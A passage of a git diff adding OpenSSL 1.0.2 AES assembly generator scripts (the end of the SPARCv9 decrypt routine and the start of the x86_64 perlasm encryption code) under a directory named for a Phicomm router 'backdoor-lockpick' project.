+	.byte	0xc8, 0xeb, 0xbb, 0x3c, 0x83, 0x53, 0x99, 0x61
+	.byte	0x17, 0x2b, 0x04, 0x7e, 0xba, 0x77, 0xd6, 0x26
+	.byte	0xe1, 0x69, 0x14, 0x63, 0x55, 0x21, 0x0c, 0x7d
+.type	AES_Td,#object
+.size	AES_Td,(.-AES_Td)
+
+.align	64
+.skip	16
+_sparcv9_AES_decrypt:
+	save	%sp,-$frame-$locals,%sp
+	stx	%i7,[%sp+$bias+$frame+0]	! off-load return address
+	ld	[$key+240],$rounds
+	ld	[$key+0],$t0
+	ld	[$key+4],$t1			!
+	ld	[$key+8],$t2
+	ld	[$key+12],$t3
+	srl	$rounds,1,$rounds
+	xor	$t0,$s0,$s0
+	ld	[$key+16],$t0
+	xor	$t1,$s1,$s1
+	ld	[$key+20],$t1
+	srl	$s0,21,$acc0			!
+	xor	$t2,$s2,$s2
+	ld	[$key+24],$t2
+	xor	$t3,$s3,$s3
+	and	$acc0,2040,$acc0
+	ld	[$key+28],$t3
+	srl	$s3,13,$acc1
+	nop
+.Ldec_loop:
+	srl	$s2,5,$acc2			!
+	and	$acc1,2040,$acc1
+	ldx	[$tbl+$acc0],$acc0
+	sll	$s1,3,$acc3
+	and	$acc2,2040,$acc2
+	ldx	[$tbl+$acc1],$acc1
+	srl	$s1,21,$acc4
+	and	$acc3,2040,$acc3
+	ldx	[$tbl+$acc2],$acc2		!
+	srl	$s0,13,$acc5
+	and	$acc4,2040,$acc4
+	ldx	[$tbl+$acc3],$acc3
+	srl	$s3,5,$acc6
+	and	$acc5,2040,$acc5
+	ldx	[$tbl+$acc4],$acc4
+	fmovs	%f0,%f0
+	sll	$s2,3,$acc7			!
+	and	$acc6,2040,$acc6
+	ldx	[$tbl+$acc5],$acc5
+	srl	$s2,21,$acc8
+	and	$acc7,2040,$acc7
+	ldx	[$tbl+$acc6],$acc6
+	srl	$s1,13,$acc9
+	and	$acc8,2040,$acc8
+	ldx	[$tbl+$acc7],$acc7		!
+	srl	$s0,5,$acc10
+	and	$acc9,2040,$acc9
+	ldx	[$tbl+$acc8],$acc8
+	sll	$s3,3,$acc11
+	and	$acc10,2040,$acc10
+	ldx	[$tbl+$acc9],$acc9
+	fmovs	%f0,%f0
+	srl	$s3,21,$acc12			!
+	and	$acc11,2040,$acc11
+	ldx	[$tbl+$acc10],$acc10
+	srl	$s2,13,$acc13
+	and	$acc12,2040,$acc12
+	ldx	[$tbl+$acc11],$acc11
+	srl	$s1,5,$acc14
+	and	$acc13,2040,$acc13
+	ldx	[$tbl+$acc12],$acc12		!
+	sll	$s0,3,$acc15
+	and	$acc14,2040,$acc14
+	ldx	[$tbl+$acc13],$acc13
+	and	$acc15,2040,$acc15
+	add	$key,32,$key
+	ldx	[$tbl+$acc14],$acc14
+	fmovs	%f0,%f0
+	subcc	$rounds,1,$rounds		!
+	ldx	[$tbl+$acc15],$acc15
+	bz,a,pn	%icc,.Ldec_last
+	add	$tbl,2048,$rounds
+
+		srlx	$acc1,8,$acc1
+		xor	$acc0,$t0,$t0
+	ld	[$key+0],$s0
+	fmovs	%f0,%f0
+		srlx	$acc2,16,$acc2		!
+		xor	$acc1,$t0,$t0
+	ld	[$key+4],$s1
+		srlx	$acc3,24,$acc3
+		xor	$acc2,$t0,$t0
+	ld	[$key+8],$s2
+		srlx	$acc5,8,$acc5
+		xor	$acc3,$t0,$t0
+	ld	[$key+12],$s3			!
+		srlx	$acc6,16,$acc6
+		xor	$acc4,$t1,$t1
+	fmovs	%f0,%f0
+		srlx	$acc7,24,$acc7
+		xor	$acc5,$t1,$t1
+		srlx	$acc9,8,$acc9
+		xor	$acc6,$t1,$t1
+		srlx	$acc10,16,$acc10	!
+		xor	$acc7,$t1,$t1
+		srlx	$acc11,24,$acc11
+		xor	$acc8,$t2,$t2
+		srlx	$acc13,8,$acc13
+		xor	$acc9,$t2,$t2
+		srlx	$acc14,16,$acc14
+		xor	$acc10,$t2,$t2
+		srlx	$acc15,24,$acc15	!
+		xor	$acc11,$t2,$t2
+		xor	$acc12,$acc14,$acc14
+		xor	$acc13,$t3,$t3
+	srl	$t0,21,$acc0
+		xor	$acc14,$t3,$t3
+		xor	$acc15,$t3,$t3
+	srl	$t3,13,$acc1
+
+	and	$acc0,2040,$acc0		!
+	srl	$t2,5,$acc2
+	and	$acc1,2040,$acc1
+	ldx	[$tbl+$acc0],$acc0
+	sll	$t1,3,$acc3
+	and	$acc2,2040,$acc2
+	ldx	[$tbl+$acc1],$acc1
+	fmovs	%f0,%f0
+	srl	$t1,21,$acc4			!
+	and	$acc3,2040,$acc3
+	ldx	[$tbl+$acc2],$acc2
+	srl	$t0,13,$acc5
+	and	$acc4,2040,$acc4
+	ldx	[$tbl+$acc3],$acc3
+	srl	$t3,5,$acc6
+	and	$acc5,2040,$acc5
+	ldx	[$tbl+$acc4],$acc4		!
+	sll	$t2,3,$acc7
+	and	$acc6,2040,$acc6
+	ldx	[$tbl+$acc5],$acc5
+	srl	$t2,21,$acc8
+	and	$acc7,2040,$acc7
+	ldx	[$tbl+$acc6],$acc6
+	fmovs	%f0,%f0
+	srl	$t1,13,$acc9			!
+	and	$acc8,2040,$acc8
+	ldx	[$tbl+$acc7],$acc7
+	srl	$t0,5,$acc10
+	and	$acc9,2040,$acc9
+	ldx	[$tbl+$acc8],$acc8
+	sll	$t3,3,$acc11
+	and	$acc10,2040,$acc10
+	ldx	[$tbl+$acc9],$acc9		!
+	srl	$t3,21,$acc12
+	and	$acc11,2040,$acc11
+	ldx	[$tbl+$acc10],$acc10
+	srl	$t2,13,$acc13
+	and	$acc12,2040,$acc12
+	ldx	[$tbl+$acc11],$acc11
+	fmovs	%f0,%f0
+	srl	$t1,5,$acc14			!
+	and	$acc13,2040,$acc13
+	ldx	[$tbl+$acc12],$acc12
+	sll	$t0,3,$acc15
+	and	$acc14,2040,$acc14
+	ldx	[$tbl+$acc13],$acc13
+		srlx	$acc1,8,$acc1
+	and	$acc15,2040,$acc15
+	ldx	[$tbl+$acc14],$acc14		!
+
+		srlx	$acc2,16,$acc2
+		xor	$acc0,$s0,$s0
+	ldx	[$tbl+$acc15],$acc15
+		srlx	$acc3,24,$acc3
+		xor	$acc1,$s0,$s0
+	ld	[$key+16],$t0
+	fmovs	%f0,%f0
+		srlx	$acc5,8,$acc5		!
+		xor	$acc2,$s0,$s0
+	ld	[$key+20],$t1
+		srlx	$acc6,16,$acc6
+		xor	$acc3,$s0,$s0
+	ld	[$key+24],$t2
+		srlx	$acc7,24,$acc7
+		xor	$acc4,$s1,$s1
+	ld	[$key+28],$t3			!
+		srlx	$acc9,8,$acc9
+		xor	$acc5,$s1,$s1
+	ldx	[$tbl+2048+0],%g0		! prefetch td4
+		srlx	$acc10,16,$acc10
+		xor	$acc6,$s1,$s1
+	ldx	[$tbl+2048+32],%g0		! prefetch td4
+		srlx	$acc11,24,$acc11
+		xor	$acc7,$s1,$s1
+	ldx	[$tbl+2048+64],%g0		! prefetch td4
+		srlx	$acc13,8,$acc13
+		xor	$acc8,$s2,$s2
+	ldx	[$tbl+2048+96],%g0		! prefetch td4
+		srlx	$acc14,16,$acc14	!
+		xor	$acc9,$s2,$s2
+	ldx	[$tbl+2048+128],%g0		! prefetch td4
+		srlx	$acc15,24,$acc15
+		xor	$acc10,$s2,$s2
+	ldx	[$tbl+2048+160],%g0		! prefetch td4
+	srl	$s0,21,$acc0
+		xor	$acc11,$s2,$s2
+	ldx	[$tbl+2048+192],%g0		! prefetch td4
+		xor	$acc12,$acc14,$acc14
+		xor	$acc13,$s3,$s3
+	ldx	[$tbl+2048+224],%g0		! prefetch td4
+	and	$acc0,2040,$acc0		!
+		xor	$acc14,$s3,$s3
+		xor	$acc15,$s3,$s3
+	ba	.Ldec_loop
+	srl	$s3,13,$acc1
+
+.align	32
+.Ldec_last:
+		srlx	$acc1,8,$acc1		!
+		xor	$acc0,$t0,$t0
+	ld	[$key+0],$s0
+		srlx	$acc2,16,$acc2
+		xor	$acc1,$t0,$t0
+	ld	[$key+4],$s1
+		srlx	$acc3,24,$acc3
+		xor	$acc2,$t0,$t0
+	ld	[$key+8],$s2			!
+		srlx	$acc5,8,$acc5
+		xor	$acc3,$t0,$t0
+	ld	[$key+12],$s3
+		srlx	$acc6,16,$acc6
+		xor	$acc4,$t1,$t1
+		srlx	$acc7,24,$acc7
+		xor	$acc5,$t1,$t1
+		srlx	$acc9,8,$acc9		!
+		xor	$acc6,$t1,$t1
+		srlx	$acc10,16,$acc10
+		xor	$acc7,$t1,$t1
+		srlx	$acc11,24,$acc11
+		xor	$acc8,$t2,$t2
+		srlx	$acc13,8,$acc13
+		xor	$acc9,$t2,$t2
+		srlx	$acc14,16,$acc14	!
+		xor	$acc10,$t2,$t2
+		srlx	$acc15,24,$acc15
+		xor	$acc11,$t2,$t2
+		xor	$acc12,$acc14,$acc14
+		xor	$acc13,$t3,$t3
+	srl	$t0,24,$acc0
+		xor	$acc14,$t3,$t3
+		xor	$acc15,$t3,$t3		!
+	srl	$t3,16,$acc1
+
+	srl	$t2,8,$acc2
+	and	$acc1,255,$acc1
+	ldub	[$rounds+$acc0],$acc0
+	srl	$t1,24,$acc4
+	and	$acc2,255,$acc2
+	ldub	[$rounds+$acc1],$acc1
+	srl	$t0,16,$acc5			!
+	and	$t1,255,$acc3
+	ldub	[$rounds+$acc2],$acc2
+	ldub	[$rounds+$acc3],$acc3
+	srl	$t3,8,$acc6
+	and	$acc5,255,$acc5
+	ldub	[$rounds+$acc4],$acc4
+	fmovs	%f0,%f0
+	srl	$t2,24,$acc8			!
+	and	$acc6,255,$acc6
+	ldub	[$rounds+$acc5],$acc5
+	srl	$t1,16,$acc9
+	and	$t2,255,$acc7
+	ldub	[$rounds+$acc6],$acc6
+	ldub	[$rounds+$acc7],$acc7
+	fmovs	%f0,%f0
+	srl	$t0,8,$acc10			!
+	and	$acc9,255,$acc9
+	ldub	[$rounds+$acc8],$acc8
+	srl	$t3,24,$acc12
+	and	$acc10,255,$acc10
+	ldub	[$rounds+$acc9],$acc9
+	srl	$t2,16,$acc13
+	and	$t3,255,$acc11
+	ldub	[$rounds+$acc10],$acc10		!
+	srl	$t1,8,$acc14
+	and	$acc13,255,$acc13
+	ldub	[$rounds+$acc11],$acc11
+	ldub	[$rounds+$acc12],$acc12
+	and	$acc14,255,$acc14
+	ldub	[$rounds+$acc13],$acc13
+	and	$t0,255,$acc15
+	ldub	[$rounds+$acc14],$acc14		!
+
+		sll	$acc0,24,$acc0
+		xor	$acc3,$s0,$s0
+	ldub	[$rounds+$acc15],$acc15
+		sll	$acc1,16,$acc1
+		xor	$acc0,$s0,$s0
+	ldx	[%sp+$bias+$frame+0],%i7	! restore return address
+	fmovs	%f0,%f0
+		sll	$acc2,8,$acc2		!
+		xor	$acc1,$s0,$s0
+		sll	$acc4,24,$acc4
+		xor	$acc2,$s0,$s0
+		sll	$acc5,16,$acc5
+		xor	$acc7,$s1,$s1
+		sll	$acc6,8,$acc6
+		xor	$acc4,$s1,$s1
+		sll	$acc8,24,$acc8		!
+		xor	$acc5,$s1,$s1
+		sll	$acc9,16,$acc9
+		xor	$acc11,$s2,$s2
+		sll	$acc10,8,$acc10
+		xor	$acc6,$s1,$s1
+		sll	$acc12,24,$acc12
+		xor	$acc8,$s2,$s2
+		sll	$acc13,16,$acc13	!
+		xor	$acc9,$s2,$s2
+		sll	$acc14,8,$acc14
+		xor	$acc10,$s2,$s2
+		xor	$acc12,$acc14,$acc14
+		xor	$acc13,$s3,$s3
+		xor	$acc14,$s3,$s3
+		xor	$acc15,$s3,$s3
+
+	ret
+	restore
+.type	_sparcv9_AES_decrypt,#function
+.size	_sparcv9_AES_decrypt,(.-_sparcv9_AES_decrypt)
+
+.align	32
+.globl	AES_decrypt
+AES_decrypt:
+	or	%o0,%o1,%g1
+	andcc	%g1,3,%g0
+	bnz,pn	%xcc,.Lunaligned_dec
+	save	%sp,-$frame,%sp
+
+	ld	[%i0+0],%o0
+	ld	[%i0+4],%o1
+	ld	[%i0+8],%o2
+	ld	[%i0+12],%o3
+
+1:	call	.+8
+	add	%o7,AES_Td-1b,%o4
+	call	_sparcv9_AES_decrypt
+	mov	%i2,%o5
+
+	st	%o0,[%i1+0]
+	st	%o1,[%i1+4]
+	st	%o2,[%i1+8]
+	st	%o3,[%i1+12]
+
+	ret
+	restore
+
+.align	32
+.Lunaligned_dec:
+	ldub	[%i0+0],%l0
+	ldub	[%i0+1],%l1
+	ldub	[%i0+2],%l2
+
+	sll	%l0,24,%l0
+	ldub	[%i0+3],%l3
+	sll	%l1,16,%l1
+	ldub	[%i0+4],%l4
+	sll	%l2,8,%l2
+	or	%l1,%l0,%l0
+	ldub	[%i0+5],%l5
+	sll	%l4,24,%l4
+	or	%l3,%l2,%l2
+	ldub	[%i0+6],%l6
+	sll	%l5,16,%l5
+	or	%l0,%l2,%o0
+	ldub	[%i0+7],%l7
+
+	sll	%l6,8,%l6
+	or	%l5,%l4,%l4
+	ldub	[%i0+8],%l0
+	or	%l7,%l6,%l6
+	ldub	[%i0+9],%l1
+	or	%l4,%l6,%o1
+	ldub	[%i0+10],%l2
+
+	sll	%l0,24,%l0
+	ldub	[%i0+11],%l3
+	sll	%l1,16,%l1
+	ldub	[%i0+12],%l4
+	sll	%l2,8,%l2
+	or	%l1,%l0,%l0
+	ldub	[%i0+13],%l5
+	sll	%l4,24,%l4
+	or	%l3,%l2,%l2
+	ldub	[%i0+14],%l6
+	sll	%l5,16,%l5
+	or	%l0,%l2,%o2
+	ldub	[%i0+15],%l7
+
+	sll	%l6,8,%l6
+	or	%l5,%l4,%l4
+	or	%l7,%l6,%l6
+	or	%l4,%l6,%o3
+
+1:	call	.+8
+	add	%o7,AES_Td-1b,%o4
+	call	_sparcv9_AES_decrypt
+	mov	%i2,%o5
+
+	srl	%o0,24,%l0
+	srl	%o0,16,%l1
+	stb	%l0,[%i1+0]
+	srl	%o0,8,%l2
+	stb	%l1,[%i1+1]
+	stb	%l2,[%i1+2]
+	srl	%o1,24,%l4
+	stb	%o0,[%i1+3]
+
+	srl	%o1,16,%l5
+	stb	%l4,[%i1+4]
+	srl	%o1,8,%l6
+	stb	%l5,[%i1+5]
+	stb	%l6,[%i1+6]
+	srl	%o2,24,%l0
+	stb	%o1,[%i1+7]
+
+	srl	%o2,16,%l1
+	stb	%l0,[%i1+8]
+	srl	%o2,8,%l2
+	stb	%l1,[%i1+9]
+	stb	%l2,[%i1+10]
+	srl	%o3,24,%l4
+	stb	%o2,[%i1+11]
+
+	srl	%o3,16,%l5
+	stb	%l4,[%i1+12]
+	srl	%o3,8,%l6
+	stb	%l5,[%i1+13]
+	stb	%l6,[%i1+14]
+	stb	%o3,[%i1+15]
+
+	ret
+	restore
+.type	AES_decrypt,#function
+.size	AES_decrypt,(.-AES_decrypt)
+___
+
+# fmovs instructions substituting for FP nops were originally added
+# to meet specific instruction alignment requirements to maximize ILP.
+# As UltraSPARC T1, a.k.a. Niagara, has shared FPU, FP nops can have
+# undesired effect, so just omit them and sacrifice some portion of
+# percent in performance...
+$code =~ s/fmovs.*$//gm;
+
+print $code;
+close STDOUT;	# ensure flush
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/aes/asm/aes-x86_64.pl b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/aes/asm/aes-x86_64.pl
new file mode 100755
index 0000000..47f4163
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/aes/asm/aes-x86_64.pl
@@ -0,0 +1,2813 @@
+#!/usr/bin/env perl
+#
+# ====================================================================
+# Written by Andy Polyakov <appro@fy.chalmers.se> for the OpenSSL
+# project. The module is, however, dual licensed under OpenSSL and
+# CRYPTOGAMS licenses depending on where you obtain it. For further
+# details see http://www.openssl.org/~appro/cryptogams/.
+# ====================================================================
+#
+# Version 2.1.
+#
+# aes-*-cbc benchmarks are improved by >70% [compared to gcc 3.3.2 on
+# Opteron 240 CPU] plus all the bells-n-whistles from 32-bit version
+# [you'll notice a lot of resemblance], such as compressed S-boxes
+# in little-endian byte order, prefetch of these tables in CBC mode,
+# as well as avoiding L1 cache aliasing between stack frame and key
+# schedule and already mentioned tables, compressed Td4...
+#
+# Performance in number of cycles per processed byte for 128-bit key:
+#
+#		ECB encrypt	ECB decrypt	CBC large chunk
+# AMD64		33		43		13.0
+# EM64T		38		56		18.6(*)
+# Core 2	30		42		14.5(*)
+# Atom		65		86		32.1(*)
+#
+# (*) with hyper-threading off
+
+$flavour = shift;
+$output  = shift;
+if ($flavour =~ /\./) { $output = $flavour; undef $flavour; }
+
+$win64=0; $win64=1 if ($flavour =~ /[nm]asm|mingw64/ || $output =~ /\.asm$/);
+
+$0 =~ m/(.*[\/\\])[^\/\\]+$/; $dir=$1;
+( $xlate="${dir}x86_64-xlate.pl" and -f $xlate ) or
+( $xlate="${dir}../../perlasm/x86_64-xlate.pl" and -f $xlate) or
+die "can't locate x86_64-xlate.pl";
+
+open OUT,"| \"$^X\" $xlate $flavour $output";
+*STDOUT=*OUT;
+
+$verticalspin=1;	# unlike 32-bit version $verticalspin performs
+			# ~15% better on both AMD and Intel cores
+$speed_limit=512;	# see aes-586.pl for details
+
+$code=".text\n";
+
+$s0="%eax";
+$s1="%ebx";
+$s2="%ecx";
+$s3="%edx";
+$acc0="%esi";	$mask80="%rsi";
+$acc1="%edi";	$maskfe="%rdi";
+$acc2="%ebp";	$mask1b="%rbp";
+$inp="%r8";
+$out="%r9";
+$t0="%r10d";
+$t1="%r11d";
+$t2="%r12d";
+$rnds="%r13d";
+$sbox="%r14";
+$key="%r15";
+
+sub hi() { my $r=shift;	$r =~ s/%[er]([a-d])x/%\1h/;	$r; }
+sub lo() { my $r=shift;	$r =~ s/%[er]([a-d])x/%\1l/;
+			$r =~ s/%[er]([sd]i)/%\1l/;
+			$r =~ s/%(r[0-9]+)[d]?/%\1b/;	$r; }
+sub LO() { my $r=shift; $r =~ s/%r([a-z]+)/%e\1/;
+			$r =~ s/%r([0-9]+)/%r\1d/;	$r; }
+sub _data_word()
+{ my $i;
+    while(defined($i=shift)) { $code.=sprintf".long\t0x%08x,0x%08x\n",$i,$i; }
+}
+sub data_word()
+{ my $i;
+  my $last=pop(@_);
+    $code.=".long\t";
+    while(defined($i=shift)) { $code.=sprintf"0x%08x,",$i; }
+    $code.=sprintf"0x%08x\n",$last;
+}
+
+sub data_byte()
+{ my $i;
+  my $last=pop(@_);
+    $code.=".byte\t";
+    while(defined($i=shift)) { $code.=sprintf"0x%02x,",$i&0xff; }
+    $code.=sprintf"0x%02x\n",$last&0xff;
+}
+
+sub encvert()
+{ my $t3="%r8d";	# zaps $inp!
+
+$code.=<<___;
+	# favor 3-way issue Opteron pipeline...
+	movzb	`&lo("$s0")`,$acc0
+	movzb	`&lo("$s1")`,$acc1
+	movzb	`&lo("$s2")`,$acc2
+	mov	0($sbox,$acc0,8),$t0
+	mov	0($sbox,$acc1,8),$t1
+	mov	0($sbox,$acc2,8),$t2
+
+	movzb	`&hi("$s1")`,$acc0
+	movzb	`&hi("$s2")`,$acc1
+	movzb	`&lo("$s3")`,$acc2
+	xor	3($sbox,$acc0,8),$t0
+	xor	3($sbox,$acc1,8),$t1
+	mov	0($sbox,$acc2,8),$t3
+
+	movzb	`&hi("$s3")`,$acc0
+	shr	\$16,$s2
+	movzb	`&hi("$s0")`,$acc2
+	xor	3($sbox,$acc0,8),$t2
+	shr	\$16,$s3
+	xor	3($sbox,$acc2,8),$t3
+
+	shr	\$16,$s1
+	lea	16($key),$key
+	shr	\$16,$s0
+
+	movzb	`&lo("$s2")`,$acc0
+	movzb	`&lo("$s3")`,$acc1
+	movzb	`&lo("$s0")`,$acc2
+	xor	2($sbox,$acc0,8),$t0
+	xor	2($sbox,$acc1,8),$t1
+	xor	2($sbox,$acc2,8),$t2
+
+	movzb	`&hi("$s3")`,$acc0
+	movzb	`&hi("$s0")`,$acc1
+	movzb	`&lo("$s1")`,$acc2
+	xor	1($sbox,$acc0,8),$t0
+	xor	1($sbox,$acc1,8),$t1
+	xor	2($sbox,$acc2,8),$t3
+
+	mov	12($key),$s3
+	movzb	`&hi("$s1")`,$acc1
+	movzb	`&hi("$s2")`,$acc2
+	mov	0($key),$s0
+	xor	1($sbox,$acc1,8),$t2
+	xor	1($sbox,$acc2,8),$t3
+
+	mov	4($key),$s1
+	mov	8($key),$s2
+	xor	$t0,$s0
+	xor	$t1,$s1
+	xor	$t2,$s2
+	xor	$t3,$s3
+___
+}
+
+sub enclastvert()
+{ my $t3="%r8d";	# zaps $inp!
+
+$code.=<<___;
+	movzb	`&lo("$s0")`,$acc0
+	movzb	`&lo("$s1")`,$acc1
+	movzb	`&lo("$s2")`,$acc2
+	movzb	2($sbox,$acc0,8),$t0
+	movzb	2($sbox,$acc1,8),$t1
+	movzb	2($sbox,$acc2,8),$t2
+
+	movzb	`&lo("$s3")`,$acc0
+	movzb	`&hi("$s1")`,$acc1
+	movzb	`&hi("$s2")`,$acc2
+	movzb	2($sbox,$acc0,8),$t3
+	mov	0($sbox,$acc1,8),$acc1	#$t0
+	mov	0($sbox,$acc2,8),$acc2	#$t1
+
+	and	\$0x0000ff00,$acc1
+	and	\$0x0000ff00,$acc2
+
+	xor	$acc1,$t0
+	xor	$acc2,$t1
+	shr	\$16,$s2
+
+	movzb	`&hi("$s3")`,$acc0
+	movzb	`&hi("$s0")`,$acc1
+	shr	\$16,$s3
+	mov	0($sbox,$acc0,8),$acc0	#$t2
+	mov	0($sbox,$acc1,8),$acc1	#$t3
+
+	and	\$0x0000ff00,$acc0
+	and	\$0x0000ff00,$acc1
+	shr	\$16,$s1
+	xor	$acc0,$t2
+	xor	$acc1,$t3
+	shr	\$16,$s0
+
+	movzb	`&lo("$s2")`,$acc0
+	movzb	`&lo("$s3")`,$acc1
+	movzb	`&lo("$s0")`,$acc2
+	mov	0($sbox,$acc0,8),$acc0	#$t0
+	mov	0($sbox,$acc1,8),$acc1	#$t1
+	mov	0($sbox,$acc2,8),$acc2	#$t2
+
+	and	\$0x00ff0000,$acc0
+	and	\$0x00ff0000,$acc1
+	and	\$0x00ff0000,$acc2
+
+	xor	$acc0,$t0
+	xor	$acc1,$t1
+	xor	$acc2,$t2
+
+	movzb	`&lo("$s1")`,$acc0
+	movzb	`&hi("$s3")`,$acc1
+	movzb	`&hi("$s0")`,$acc2
+	mov	0($sbox,$acc0,8),$acc0	#$t3
+	mov	2($sbox,$acc1,8),$acc1	#$t0
+	mov	2($sbox,$acc2,8),$acc2	#$t1
+
+	and	\$0x00ff0000,$acc0
+	and	\$0xff000000,$acc1
+	and	\$0xff000000,$acc2
+
+	xor	$acc0,$t3
+	xor	$acc1,$t0
+	xor	$acc2,$t1
+
+	movzb	`&hi("$s1")`,$acc0
+	movzb	`&hi("$s2")`,$acc1
+	mov	16+12($key),$s3
+	mov	2($sbox,$acc0,8),$acc0	#$t2
+	mov	2($sbox,$acc1,8),$acc1	#$t3
+	mov	16+0($key),$s0
+
+	and	\$0xff000000,$acc0
+	and	\$0xff000000,$acc1
+
+	xor	$acc0,$t2
+	xor	$acc1,$t3
+
+	mov	16+4($key),$s1
+	mov	16+8($key),$s2
+	xor	$t0,$s0
+	xor	$t1,$s1
+	xor	$t2,$s2
+	xor	$t3,$s3
+___
+}
+
+sub encstep()
+{ my ($i,@s) = @_;
+  my $tmp0=$acc0;
+  my $tmp1=$acc1;
+  my $tmp2=$acc2;
+  my $out=($t0,$t1,$t2,$s[0])[$i];
+
+	if ($i==3) {
+		$tmp0=$s[1];
+		$tmp1=$s[2];
+		$tmp2=$s[3];
+	}
+	$code.="	movzb	".&lo($s[0]).",$out\n";
+	$code.="	mov	$s[2],$tmp1\n"		if ($i!=3);
+	$code.="	lea	16($key),$key\n"	if ($i==0);
+
+	$code.="	movzb	".&hi($s[1]).",$tmp0\n";
+	$code.="	mov	0($sbox,$out,8),$out\n";
+
+	$code.="	shr	\$16,$tmp1\n";
+	$code.="	mov	$s[3],$tmp2\n"		if ($i!=3);
+	$code.="	xor	3($sbox,$tmp0,8),$out\n";
+
+	$code.="	movzb	".&lo($tmp1).",$tmp1\n";
+	$code.="	shr	\$24,$tmp2\n";
+	$code.="	xor	4*$i($key),$out\n";
+
+	$code.="	xor	2($sbox,$tmp1,8),$out\n";
+	$code.="	xor	1($sbox,$tmp2,8),$out\n";
+
+	$code.="	mov	$t0,$s[1]\n"		if ($i==3);
+	$code.="	mov	$t1,$s[2]\n"		if ($i==3);
+	$code.="	mov	$t2,$s[3]\n"		if ($i==3);
+	$code.="\n";
+}
+
+sub enclast()
+{ my ($i,@s)=@_;
+  my $tmp0=$acc0;
+  my $tmp1=$acc1;
+  my $tmp2=$acc2;
+  my $out=($t0,$t1,$t2,$s[0])[$i];
+
+	if ($i==3) {
+		$tmp0=$s[1];
+		$tmp1=$s[2];
+		$tmp2=$s[3];
+	}
+	$code.="	movzb	".&lo($s[0]).",$out\n";
+	$code.="	mov	$s[2],$tmp1\n"		if ($i!=3);
+
+	$code.="	mov	2($sbox,$out,8),$out\n";
+	$code.="	shr	\$16,$tmp1\n";
+	$code.="	mov	$s[3],$tmp2\n"		if ($i!=3);
+
+	$code.="	and	\$0x000000ff,$out\n";
+	$code.="	movzb	".&hi($s[1]).",$tmp0\n";
+	$code.="	movzb	".&lo($tmp1).",$tmp1\n";
+	$code.="	shr	\$24,$tmp2\n";
+
+	$code.="	mov	0($sbox,$tmp0,8),$tmp0\n";
+	$code.="	mov	0($sbox,$tmp1,8),$tmp1\n";
+	$code.="	mov	2($sbox,$tmp2,8),$tmp2\n";
+
+	$code.="	and	\$0x0000ff00,$tmp0\n";
+	$code.="	and	\$0x00ff0000,$tmp1\n";
+	$code.="	and	\$0xff000000,$tmp2\n";
+
+	$code.="	xor	$tmp0,$out\n";
+	$code.="	mov	$t0,$s[1]\n"		if ($i==3);
+	$code.="	xor	$tmp1,$out\n";
+	$code.="	mov	$t1,$s[2]\n"		if ($i==3);
+	$code.="	xor	$tmp2,$out\n";
+	$code.="	mov	$t2,$s[3]\n"		if ($i==3);
+	$code.="\n";
+}
+
+$code.=<<___;
+.type	_x86_64_AES_encrypt,\@abi-omnipotent
+.align	16
+_x86_64_AES_encrypt:
+	xor	0($key),$s0			# xor with key
+	xor	4($key),$s1
+	xor	8($key),$s2
+	xor	12($key),$s3
+
+	mov	240($key),$rnds			# load key->rounds
+	sub	\$1,$rnds
+	jmp	.Lenc_loop
+.align	16
+.Lenc_loop:
+___
+	if ($verticalspin) { &encvert(); }
+	else {	&encstep(0,$s0,$s1,$s2,$s3);
+		&encstep(1,$s1,$s2,$s3,$s0);
+		&encstep(2,$s2,$s3,$s0,$s1);
+		&encstep(3,$s3,$s0,$s1,$s2);
+	}
+$code.=<<___;
+	sub	\$1,$rnds
+	jnz	.Lenc_loop
+___
+	if ($verticalspin) { &enclastvert(); }
+	else {	&enclast(0,$s0,$s1,$s2,$s3);
+		&enclast(1,$s1,$s2,$s3,$s0);
+		&enclast(2,$s2,$s3,$s0,$s1);
+		&enclast(3,$s3,$s0,$s1,$s2);
+		$code.=<<___;
+		xor	16+0($key),$s0		# xor with key
+		xor	16+4($key),$s1
+		xor	16+8($key),$s2
+		xor	16+12($key),$s3
+___
+	}
+$code.=<<___;
+	.byte	0xf3,0xc3			# rep ret
+.size	_x86_64_AES_encrypt,.-_x86_64_AES_encrypt
+___
+
+# it's possible to implement this by shifting tN by 8, filling least
+# significant byte with byte load and finally bswap-ing at the end,
+# but such partial register load kills Core 2...
+sub enccompactvert()
+{ my ($t3,$t4,$t5)=("%r8d","%r9d","%r13d");
+
+$code.=<<___;
+	movzb	`&lo("$s0")`,$t0
+	movzb	`&lo("$s1")`,$t1
+	movzb	`&lo("$s2")`,$t2
+	movzb	`&lo("$s3")`,$t3
+	movzb	`&hi("$s1")`,$acc0
+	movzb	`&hi("$s2")`,$acc1
+	shr	\$16,$s2
+	movzb	`&hi("$s3")`,$acc2
+	movzb	($sbox,$t0,1),$t0
+	movzb	($sbox,$t1,1),$t1
+	movzb	($sbox,$t2,1),$t2
+	movzb	($sbox,$t3,1),$t3
+
+	movzb	($sbox,$acc0,1),$t4	#$t0
+	movzb	`&hi("$s0")`,$acc0
+	movzb	($sbox,$acc1,1),$t5	#$t1
+	movzb	`&lo("$s2")`,$acc1
+	movzb	($sbox,$acc2,1),$acc2	#$t2
+	movzb	($sbox,$acc0,1),$acc0	#$t3
+
+	shl	\$8,$t4
+	shr	\$16,$s3
+	shl	\$8,$t5
+	xor	$t4,$t0
+	shr	\$16,$s0
+	movzb	`&lo("$s3")`,$t4
+	shr	\$16,$s1
+	xor	$t5,$t1
+	shl	\$8,$acc2
+	movzb	`&lo("$s0")`,$t5
+	movzb	($sbox,$acc1,1),$acc1	#$t0
+	xor	$acc2,$t2
+
+	shl	\$8,$acc0
+	movzb	`&lo("$s1")`,$acc2
+	shl	\$16,$acc1
+	xor	$acc0,$t3
+	movzb	($sbox,$t4,1),$t4	#$t1
+	movzb	`&hi("$s3")`,$acc0
+	movzb	($sbox,$t5,1),$t5	#$t2
+	xor	$acc1,$t0
+
+	shr	\$8,$s2
+	movzb	`&hi("$s0")`,$acc1
+	shl	\$16,$t4
+	shr	\$8,$s1
+	shl	\$16,$t5
+	xor	$t4,$t1
+	movzb	($sbox,$acc2,1),$acc2	#$t3
+	movzb	($sbox,$acc0,1),$acc0	#$t0
+	movzb	($sbox,$acc1,1),$acc1	#$t1
+	movzb	($sbox,$s2,1),$s3	#$t3
+	movzb	($sbox,$s1,1),$s2	#$t2
+
+	shl	\$16,$acc2
